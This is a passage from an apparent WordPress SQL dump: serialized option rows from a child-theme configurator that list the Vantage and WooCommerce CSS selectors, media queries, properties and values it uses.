.widget_circleicon-widget\";i:540;s:67:\".vantage-circleicon-loop .widget_circleicon-widget .circle-icon-box\";i:541;s:31:\".vantage-circleicon-loop .clear\";i:542;s:12:\".woocommerce\";i:543;s:34:\".woocommerce #page-wrapper .button\";i:544;s:40:\".woocommerce #page-wrapper h1.page-title\";i:545;s:42:\".woocommerce #page-wrapper h1.page-title a\";i:546;s:50:\".woocommerce #page-wrapper .product h1.entry-title\";i:547;s:52:\".woocommerce #page-wrapper .product h1.entry-title a\";i:548;s:46:\".woocommerce #page-wrapper .product .cart .qty\";i:549;s:96:\".woocommerce #page-wrapper .upsells.products h2, .woocommerce #page-wrapper .related.products h2\";i:550;s:136:\".woocommerce #page-wrapper .upsells.products ul.products li.product, .woocommerce #page-wrapper .related.products ul.products li.product\";i:551;s:47:\".woocommerce #page-wrapper .woocommerce-message\";i:552;s:56:\".woocommerce #page-wrapper .woocommerce-message a.button\";i:553;s:50:\".woocommerce #page-wrapper .woocommerce-breadcrumb\";i:554;s:39:\".woocommerce #page-wrapper #reply-title\";i:555;s:21:\".woocommerce a.remove\";i:556;s:105:\".woocommerce a.button, .woocommerce .checkout-button, .woocommerce input.button, .woocommerce .button.alt\";i:557;s:129:\".woocommerce a.button:focus, .woocommerce .checkout-button:focus, .woocommerce input.button:focus, .woocommerce .button.alt:focus\";i:558;s:133:\".woocommerce a.button:active, .woocommerce .checkout-button:active, .woocommerce input.button:active, .woocommerce .button.alt:active\";i:559;s:24:\".woocommerce .button.alt\";i:560;s:311:\".woocommerce .button.alt:hover, .woocommerce .button.alt:active, .woocommerce .button.alt.disabled, .woocommerce .button.alt:disabled, .woocommerce .button.alt:disabled[disabled], .woocommerce .button.alt.disabled:hover, .woocommerce .button.alt:disabled:hover, .woocommerce .button.alt:disabled[disabled]:hover\";i:561;s:41:\".woocommerce .shop_table .actions .button\";i:562;s:41:\".woocommerce td.product-name dl.variation\";i:563;s:44:\".woocommerce td.product-name dl.variation dt\";i:564;s:44:\".woocommerce td.product-name dl.variation dd\";i:565;s:46:\".woocommerce td.product-name dl.variation dd p\";i:566;s:52:\".woocommerce td.product-name dl.variation:last-child\";i:567;s:28:\".woocommerce-page #container\";i:568;s:39:\".woocommerce-page.no-sidebar #container\";i:569;s:50:\".woocommerce-page.sidebar-position-left #container\";i:570;s:50:\".woocommerce-page.sidebar-position-none #container\";i:571;s:19:\".widget.woocommerce\";i:572;s:26:\".widget.woocommerce:before\";i:573;s:25:\".widget.woocommerce:after\";i:574;s:43:\".widget.woocommerce .product_list_widget li\";i:575;s:52:\".widget.woocommerce .product_list_widget li a.remove\";i:576;s:47:\".widget.woocommerce .product_list_widget li img\";i:577;s:61:\".widget.woocommerce .product_list_widget li .quantity .amount\";i:578;s:56:\".widget.woocommerce .product_list_widget li dl.variation\";i:579;s:59:\".widget.woocommerce .product_list_widget li dl.variation dt\";i:580;s:59:\".widget.woocommerce .product_list_widget li dl.variation dd\";i:581;s:64:\".widget.woocommerce.widget_shopping_cart .product_list_widget li\";i:582;s:47:\".widget.woocommerce.widget_product_search label\";i:583;s:62:\".widget.woocommerce.widget_product_search input[type=\"search\"]\";i:584;s:62:\".widget.woocommerce.widget_product_search input[type=\"submit\"]\";i:585;s:26:\".widget.woocommerce .total\";i:586;s:28:\".widget.woocommerce .buttons\";i:587;s:27:\".widget.woocommerce .button\";i:588;s:92:\".woocommerce-page.woocommerce-cart #primary, .woocommerce-page.woocommerce-checkout #primary\";i:589;s:114:\".woocommerce-page.woocommerce-cart.no-sidebar #primary, .woocommerce-page.woocommerce-checkout.no-sidebar #primary\";i:590;s:136:\".woocommerce-page.woocommerce-cart.sidebar-position-left #primary, .woocommerce-page.woocommerce-checkout.sidebar-position-left #primary\";i:591;s:136:\".woocommerce-page.woocommerce-cart.sidebar-position-none #primary, .woocommerce-page.woocommerce-checkout.sidebar-position-none #primary\";i:592;s:74:\".woocommerce-page.woocommerce-checkout #ship-to-different-address-checkbox\";i:593;s:21:\"#infinite-handle span\";i:594;s:27:\"#infinite-handle span:hover\";i:595;s:28:\"#infinite-handle span button\";i:596;s:18:\"#yoast-breadcrumbs\";i:597;s:20:\"#yoast-breadcrumbs a\";i:598;s:51:\"[class^=\"vantage-icon-\"], [class*=\" vantage-icon-\"]\";i:599;s:31:\".vantage-icon-arrow-down:before\";i:600;s:31:\".vantage-icon-arrow-left:before\";i:601;s:32:\".vantage-icon-arrow-right:before\";i:602;s:29:\".vantage-icon-arrow-up:before\";i:603;s:27:\".vantage-icon-search:before\";i:604;s:27:\"span.jwcontrols span button\";i:605;s:19:\".screen-reader-text\";i:606;s:80:\".screen-reader-text:hover, .screen-reader-text:active, .screen-reader-text:focus\";i:607;}','no'),(464,'chld_thm_cfg_options_dict_query','a:6:{s:26:\"@media (max-width: 1080px)\";i:1;s:25:\"@media (max-width: 680px)\";i:2;s:25:\"@media (max-width: 480px)\";i:3;s:53:\"@media screen and (-webkit-min-device-pixel-ratio: 2)\";i:4;s:25:\"@media (max-width: 640px)\";i:5;s:4:\"base\";i:6;}','no'),(465,'chld_thm_cfg_options_dict_rule','a:87:{s:9:\"max-width\";i:1;s:6:\"height\";i:2;s:11:\"margin-left\";i:3;s:12:\"margin-right\";i:4;s:5:\"float\";i:5;s:12:\"padding-left\";i:6;s:13:\"padding-right\";i:7;s:7:\"display\";i:8;s:10:\"margin-top\";i:9;s:13:\"margin-bottom\";i:10;s:11:\"padding-top\";i:11;s:14:\"padding-bottom\";i:12;s:5:\"width\";i:13;s:10:\"text-align\";i:14;s:8:\"position\";i:15;s:16:\"background-image\";i:16;s:15:\"background-size\";i:17;s:6:\"border\";i:18;s:11:\"font-family\";i:19;s:9:\"font-size\";i:20;s:10:\"font-style\";i:21;s:11:\"font-weight\";i:22;s:7:\"outline\";i:23;s:14:\"vertical-align\";i:24;s:10:\"overflow-y\";i:25;s:24:\"-webkit-text-size-adjust\";i:26;s:20:\"-ms-text-size-adjust\";i:27;s:16:\"background-color\";i:28;s:10:\"list-style\";i:29;s:15:\"border-collapse\";i:30;s:14:\"border-spacing\";i:31;s:7:\"content\";i:32;s:6:\"quotes\";i:33;s:5:\"color\";i:34;s:11:\"line-height\";i:35;s:9:\"word-wrap\";i:36;s:8:\"overflow\";i:37;s:13:\"border-bottom\";i:38;s:6:\"cursor\";i:39;s:15:\"text-decoration\";i:40;s:6:\"bottom\";i:41;s:3:\"top\";i:42;s:16:\"42vertical-align\";i:43;s:10:\"box-sizing\";i:44;s:10:\"42overflow\";i:45;s:10:\"border-top\";i:46;s:11:\"border-left\";i:47;s:12:\"border-right\";i:48;s:13:\"border-radius\";i:49;s:10:\"box-shadow\";i:50;s:11:\"text-shadow\";i:51;s:18:\"-webkit-appearance\";i:52;s:5:\"clear\";i:53;s:4:\"clip\";i:54;s:4:\"zoom\";i:55;s:5:\"right\";i:56;s:13:\"-ms-flex-pack\";i:57;s:14:\"-ms-flex-align\";i:58;s:13:\"-moz-box-pack\";i:59;s:14:\"-moz-box-align\";i:60;s:16:\"-webkit-box-pack\";i:61;s:17:\"-webkit-box-align\";i:62;s:8:\"box-pack\";i:63;s:9:\"box-align\";i:64;s:10:\"max-height\";i:65;s:10:\"overflow-x\";i:66;s:10:\"transition\";i:67;s:4:\"left\";i:68;s:7:\"z-index\";i:69;s:9:\"min-width\";i:70;s:14:\"text-transform\";i:71;s:10:\"min-height\";i:72;s:15:\"list-style-type\";i:73;s:11:\"white-space\";i:74;s:9:\"transform\";i:75;s:7:\"opacity\";i:76;s:27:\"-webkit-backface-visibility\";i:77;s:19:\"background-position\";i:78;s:11:\"text-indent\";i:79;s:17:\"background-repeat\";i:80;s:12:\"border-color\";i:81;s:14:\"letter-spacing\";i:82;s:16:\"border-top-color\";i:83;s:5:\"speak\";i:84;s:12:\"font-variant\";i:85;s:14:\"font-smoothing\";i:86;s:23:\"-moz-osx-font-smoothing\";i:87;}','no'),(466,'chld_thm_cfg_options_dict_val','a:402:{s:4:\"100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}\";i:1;s:4:\"auto\";i:2;s:4:\"20px\";i:3;i:0;i:4;s:5:\"right\";i:5;s:4:\"none\";i:6;s:5:\"-35px\";i:7;s:4:\"25px\";i:8;s:4:\"35px\";i:9;s:6:\"center\";i:10;s:12:\"inline-block\";i:11;s:6:\"static\";i:12;s:5:\"block\";i:13;s:4:\"30px\";i:14;s:5:\"240px\";i:15;s:3:\"3px\";i:16;s:3:\"6px\";i:17;s:7:\"inherit\";i:18;s:4:\"10px\";i:19;s:34:\"url(./images/retina/more-icon.png)\";i:20;s:7:\"5px 8px\";i:21;s:9:\"32px 85px\";i:22;s:5:\"cover\";i:23;s:37:\"url(./images/retina/gallery-prev.png)\";i:24;s:37:\"url(./images/retina/gallery-next.png)\";i:25;s:3:\"50{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}\";i:26;s:8:\"baseline\";i:27;s:5:\"62.5{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}\";i:28;s:6:\"scroll\";i:29;s:4:\"#fff\";i:30;s:8:\"separate\";i:31;s:6:\"normal\";i:32;s:4:\"left\";i:33;s:2:\"\"\"\";i:34;s:5:\"\"\" \"\"\";i:35;s:11:\"thin dotted\";i:36;s:4:\"#333\";i:37;s:5:\"Arial\";i:38;s:63:\"\"Helvetica Neue\", Helvetica, Arial, \"Lucida Grande\", sans-serif\";i:39;s:5:\"1.5em\";i:40;s:4:\"13px\";i:41;s:10:\"break-word\";i:42;s:7:\"#248cc8\";i:43;s:7:\"#f47e3c\";i:44;s:4:\"#ccc\";i:45;s:3:\"1px\";i:46;s:3:\"3em\";i:47;s:4:\"disc\";i:48;s:7:\"decimal\";i:49;s:4:\"bold\";i:50;s:6:\"italic\";i:51;s:4:\"#eee\";i:52;s:38:\"\"Courier 10 Pitch\", Courier, monospace\";i:53;s:3:\"1.6\";i:54;s:5:\"1.6em\";i:55;s:28:\"\"Courier New\", Courier, mono\";i:56;s:15:\"1px dotted #666\";i:57;s:4:\"help\";i:58;s:7:\"#fff9c0\";i:59;s:3:\"75{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}\";i:60;s:8:\"relative\";i:61;s:3:\"1ex\";i:62;s:4:\".5ex\";i:63;s:4:\"125{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}\";i:64;s:6:\"middle\";i:65;s:10:\"border-box\";i:66;s:7:\"visible\";i:67;s:4:\"12px\";i:68;s:17:\"solid 1px #d2d2d2\";i:69;s:17:\"solid 1px #c3c3c3\";i:70;s:17:\"solid 1px #9f9f9f\";i:71;s:27:\"bottom:#dfdfdf:0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}:#fff:100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}\";i:72;s:58:\"-moz-linear-gradient(center bottom, #dfdfdf 0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #fff 100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235})\";i:73;s:24:\"top:#fff:0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}:#dfdfdf:100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}\";i:74;s:7:\"#646464\";i:75;s:67:\"0 1px 1px rgba(0,0,0,0.125), inset 0 1px 0 rgba(255, 255, 255, 0.5)\";i:76;s:7:\"pointer\";i:77;i:1;i:78;s:32:\"0 1px 0 rgba(255, 255, 255, 0.8)\";i:79;s:17:\"solid 1px #dadada\";i:80;s:17:\"solid 1px #cfcfcf\";i:81;s:17:\"solid 1px #a8a8a8\";i:82;s:27:\"bottom:#ebebeb:0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}:#fff:100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}\";i:83;s:58:\"-moz-linear-gradient(center bottom, #ebebeb 0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #fff 100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235})\";i:84;s:24:\"top:#fff:0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}:#ebebeb:100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}\";i:85;s:14:\"solid 1px #aaa\";i:86;s:14:\"solid 1px #bbb\";i:87;s:76:\"inset 0 -1px 0 rgba(255, 255, 255, 0.5), inset 0 2px 5px rgba(0, 0, 0, 0.15)\";i:88;s:9:\"textfield\";i:89;s:4:\"#666\";i:90;s:14:\"1px solid #ccc\";i:91;s:4:\"#111\";i:92;s:3:\"top\";i:93;s:6:\"inline\";i:94;s:4:\"both\";i:95;s:21:\"rect(1px 1px 1px 1px)\";i:96;s:24:\"rect(1px, 1px, 1px, 1px)\";i:97;s:8:\"absolute\";i:98;s:7:\"#dadada\";i:99;s:6:\"1080px\";i:100;s:6:\"hidden\";i:101;s:7:\"#fcfcfc\";i:102;s:2:\"\'\'\";i:103;s:5:\"table\";i:104;s:4:\"45px\";i:105;i:100;i:106;s:4:\"36px\";i:107;s:3:\"1em\";i:108;s:6:\"bottom\";i:109;s:5:\"1.2em\";i:110;s:6:\"-0.6em\";i:111;s:7:\"#4b4b4b\";i:112;s:4:\"15px\";i:113;s:11:\"-ms-flexbox\";i:114;s:8:\"-moz-box\";i:115;s:11:\"-webkit-box\";i:116;s:3:\"box\";i:117;s:3:\"5px\";i:118;s:4:\"33px\";i:119;s:4:\"40px\";i:120;s:7:\"71.287{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}\";i:121;s:7:\"23.762{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}\";i:122;s:28:\"0 1px 1px rgba(0, 0, 0, 0.5)\";i:123;s:4:\"50px\";i:124;s:19:\"rgba(0, 0, 0, 0.25)\";i:125;s:15:\"3px solid white\";i:126;s:7:\"#343538\";i:127;s:4:\"16px\";i:128;s:5:\"0.5em\";i:129;s:7:\"#00bcff\";i:130;s:13:\"all 0.4s ease\";i:131;s:26:\"0 1px 2px rgba(0,0,0,0.15)\";i:132;s:7:\"#464646\";i:133;i:99999;i:134;s:5:\"200px\";i:135;s:7:\"#e2e2e2\";i:136;s:4:\"-6px\";i:137;s:40:\"rgba(0, 0, 0, 0.25) 0 6px 6px -6px inset\";i:138;s:4:\"59px\";i:139;s:13:\"\'FontAwesome\'\";i:140;s:4:\"14px\";i:141;s:7:\"\"\\f00b\"\";i:142;i:110;i:143;s:7:\"#303134\";i:144;s:4:\"17px\";i:145;s:4:\"-8px\";i:146;s:6:\"-8.5px\";i:147;s:7:\"#d1d1d1\";i:148;s:7:\"#2d2e31\";i:149;i:10;i:150;i:200;i:151;s:4:\"42px\";i:152;s:11:\"transparent\";i:153;s:7:\"#3b3b3b\";i:154;s:5:\"1.8em\";i:155;i:500;i:156;s:5:\"-15px\";i:157;s:14:\"1px solid #eee\";i:158;s:5:\"17.5{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}\";i:159;s:7:\"#4f5355\";i:160;s:3:\"4px\";i:161;s:7:\"#74787a\";i:162;s:3:\"2px\";i:163;s:5:\"white\";i:164;s:9:\"uppercase\";i:165;s:25:\"0 1px 1px rgba(0,0,0,0.2)\";i:166;s:29:\"0 1px 1px rgba(0, 0, 0, 0.75)\";i:167;s:6:\"1.35em\";i:168;s:7:\"#8f8f8f\";i:169;s:7:\"#5e5e5e\";i:170;s:4:\"11px\";i:171;s:27:\"0 1px 1px rgba(0,0,0,0.125)\";i:172;s:7:\"#f0f0f0\";i:173;s:5:\"132px\";i:174;s:7:\"#f9f9f9\";i:175;s:33:\"inset 2px 0 2px rgba(0,0,0,0.035)\";i:176;s:6:\"1.25em\";i:177;s:5:\"1.1em\";i:178;s:17:\"1px solid #e0e0e0\";i:179;s:5:\"110px\";i:180;s:4:\"#999\";i:181;s:6:\"0.85em\";i:182;s:4:\"#777\";i:183;s:5:\"0.2em\";i:184;s:6:\"11.68{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}\";i:185;s:5:\"650px\";i:186;s:6:\"84.41{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}\";i:187;s:5:\"-20px\";i:188;s:3:\"7px\";i:189;s:13:\"all 0.2s ease\";i:190;s:14:\"1px solid #aaa\";i:191;s:17:\"1px solid #d9d9d9\";i:192;s:29:\"0 1px 2px rgba(0, 0, 0, 0.09)\";i:193;s:17:\"1px solid #ededed\";i:194;s:8:\"collapse\";i:195;i:2;i:196;s:3:\"8px\";i:197;s:27:\"0 1px 2px rgba(0,0,0,0.175)\";i:198;s:6:\"square\";i:199;s:11:\"upper-alpha\";i:200;s:11:\"lower-roman\";i:201;s:4:\"#444\";i:202;s:5:\"1.7em\";i:203;s:5:\"1.4em\";i:204;s:3:\"9px\";i:205;s:30:\"bottom:#d0d0d0:0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}:#f0f0f0:100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}\";i:206;s:61:\"-moz-linear-gradient(center bottom, #d0d0d0 0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #f0f0f0 100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235})\";i:207;s:27:\"top:#f0f0f0:0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}:#d0d0d0:100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}\";i:208;s:7:\"#606060\";i:209;s:14:\"solid 1px #222\";i:210;s:27:\"bottom:#505050:0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}:#333:100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}\";i:211;s:58:\"-moz-linear-gradient(center bottom, #505050 0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #333 100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235})\";i:212;s:24:\"top:#333:0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}:#505050:100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}\";i:213;s:59:\"0 1px 1px rgba(0,0,0,0.125), inset 0 0 5px rgba(0,0,0, 0.5)\";i:214;s:7:\"#efefef\";i:215;s:6:\"nowrap\";i:216;s:14:\"2px solid #555\";i:217;s:6:\"0.75em\";i:218;s:3:\"2em\";i:219;s:4:\"75px\";i:220;s:25:\"0 1px 2px rgba(0,0,0,0.1)\";i:221;s:7:\"#474747\";i:222;s:6:\"0.35em\";i:223;s:6:\"11.5px\";i:224;s:7:\"#747474\";i:225;s:3:\"25{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}\";i:226;s:5:\"0.8em\";i:227;s:7:\"#a40802\";i:228;s:7:\"#2f3033\";i:229;s:4:\"#aaa\";i:230;s:4:\"#ddd\";i:231;s:5:\"fixed\";i:232;s:18:\"rgba(0, 0, 0, 0.2)\";i:233;s:11:\"scale(0, 0)\";i:234;s:4:\"18px\";i:235;s:24:\"rgba(255, 255, 255, 0.2)\";i:236;s:11:\"scale(1, 1)\";i:237;s:9:\"1.92857em\";i:238;s:29:\"0 2px 2px rgba(0, 0, 0, 0.15)\";i:239;s:18:\"rgba(0, 0, 0, 0.5)\";i:240;s:13:\"center center\";i:241;i:20;i:242;s:8:\"-99999px\";i:243;s:50:\"url(./images/sprites/slide-indicator-inactive.png)\";i:244;s:48:\"url(./images/sprites/slide-indicator-active.png)\";i:245;s:4:\"32px\";i:246;s:4:\"85px\";i:247;s:5:\"-52px\";i:248;s:17:\"opacity 0.2s ease\";i:249;s:38:\"url(./images/sprites/gallery-prev.png)\";i:250;s:38:\"url(./images/sprites/gallery-next.png)\";i:251;s:3:\"0.9\";i:252;s:4:\"46px\";i:253;s:24:\"url(./slider/action.png)\";i:254;s:9:\"no-repeat\";i:255;s:12:\"right center\";i:256;s:4:\"-5px\";i:257;s:7:\"#b9b9b9\";i:258;s:4:\"26px\";i:259;s:7:\"0.875em\";i:260;s:12:\"0 1px 0 #000\";i:261;s:95:\"inset 0 1px 0 rgba(255,255,255,0.3), inset 0 -1px 0 rgba(0,0,0,0.05), 0 1px 2px rgba(0,0,0,0.1)\";i:262;s:7:\"#107fc9\";i:263;s:30:\"bottom:#0f75b8:0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}:#1189da:100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}\";i:264;s:61:\"-moz-linear-gradient(center bottom, #0f75b8 0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #1189da 100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235})\";i:265;s:27:\"top:#1189da:0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}:#0f75b8:100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}\";i:266;s:17:\"solid 1px #0b5587\";i:267;s:17:\"solid 1px #094974\";i:268;s:17:\"solid 1px #083d61\";i:269;i:600;i:270;s:8:\"0.4286em\";i:271;s:8:\"0.2143em\";i:272;s:8:\"0.1429em\";i:273;s:19:\"0.1429em solid #fff\";i:274;s:7:\"#434447\";i:275;s:4:\"23px\";i:276;s:5:\"0.4em\";i:277;s:6:\"0.95em\";i:278;s:14:\"1px solid #ddd\";i:279;s:7:\"#f6f6f6\";i:280;s:26:\"0 2px 2px rgba(0,0,0,0.05)\";i:281;s:4:\"24px\";i:282;s:7:\"#3a3b3e\";i:283;s:4:\"65px\";i:284;s:5:\"130px\";i:285;s:13:\"all 0.5s ease\";i:286;s:6:\"-0.5em\";i:287;s:35:\"url(./images/sprites/more-icon.png)\";i:288;s:7:\"-32.5px\";i:289;s:7:\"81.25px\";i:290;s:7:\"162.5px\";i:291;s:7:\"91.25px\";i:292;s:9:\"-40.625px\";i:293;s:5:\"100px\";i:294;s:4:\"44px\";i:295;s:5:\"-50px\";i:296;s:4:\"60px\";i:297;s:62:\"inset 0 1px 0 rgba(255,255,255,0.2), 0 1px 1px rgba(0,0,0,0.1)\";i:298;s:7:\"-0.45em\";i:299;s:30:\"0 1px 1px rgba(0, 0, 0, 0.125)\";i:300;s:4:\"-9px\";i:301;s:7:\"#597ac7\";i:302;s:30:\"bottom:#597ac7:0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}:#6483cb:100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}\";i:303;s:61:\"-moz-linear-gradient(center bottom, #597ac7 0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #6483cb 100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235})\";i:304;s:27:\"top:#6483cb:0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}:#597ac7:100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}\";i:305;s:17:\"1px solid #466bc1\";i:306;s:7:\"#6886cc\";i:307;s:30:\"bottom:#6886cc:0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}:#748fd0:100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}\";i:308;s:61:\"-moz-linear-gradient(center bottom, #6886cc 0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #748fd0 100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235})\";i:309;s:27:\"top:#748fd0:0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}:#6886cc:100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}\";i:310;s:17:\"1px solid #5577c6\";i:311;s:7:\"#5bbcec\";i:312;s:30:\"bottom:#5bbcec:0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}:#69c2ee:100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}\";i:313;s:61:\"-moz-linear-gradient(center bottom, #5bbcec 0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #69c2ee 100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235})\";i:314;s:27:\"top:#69c2ee:0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}:#5bbcec:100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}\";i:315;s:17:\"1px solid #44b3e9\";i:316;s:63:\"inset 0 1px 0 rgba(255,255,255,0.25), 0 1px 1px rgba(0,0,0,0.1)\";i:317;s:7:\"#6dc3ee\";i:318;s:30:\"bottom:#6dc3ee:0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}:#7bc9f0:100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}\";i:319;s:61:\"-moz-linear-gradient(center bottom, #6dc3ee 0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #7bc9f0 100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235})\";i:320;s:27:\"top:#7bc9f0:0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}:#6dc3ee:100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}\";i:321;s:17:\"1px solid #56baeb\";i:322;s:7:\"#f80000\";i:323;s:30:\"bottom:#f80000:0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}:#ff0808:100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}\";i:324;s:61:\"-moz-linear-gradient(center bottom, #f80000 0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #ff0808 100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235})\";i:325;s:27:\"top:#ff0808:0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}:#f80000:100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}\";i:326;s:17:\"1px solid #df0000\";i:327;s:7:\"#ff0d0d\";i:328;s:30:\"bottom:#ff0d0d:0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}:#ff1d1d:100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}\";i:329;s:61:\"-moz-linear-gradient(center bottom, #ff0d0d 0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #ff1d1d 100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235})\";i:330;s:27:\"top:#ff1d1d:0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}:#ff0d0d:100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}\";i:331;s:17:\"1px solid #f30000\";i:332;s:7:\"#ff9200\";i:333;s:30:\"bottom:#ff9200:0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}:#ff990f:100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}\";i:334;s:61:\"-moz-linear-gradient(center bottom, #ff9200 0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #ff990f 100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235})\";i:335;s:27:\"top:#ff990f:0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}:#ff9200:100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}\";i:336;s:17:\"1px solid #e68300\";i:337;s:7:\"#ff9b14\";i:338;s:30:\"bottom:#ff9b14:0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}:#ffa124:100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}\";i:339;s:61:\"-moz-linear-gradient(center bottom, #ff9b14 0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #ffa124 100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235})\";i:340;s:27:\"top:#ffa124:0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}:#ff9b14:100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}\";i:341;s:17:\"1px solid #fa8f00\";i:342;s:4:\"#555\";i:343;s:17:\"1px solid #e6e6e6\";i:344;s:25:\"0 1px 1px 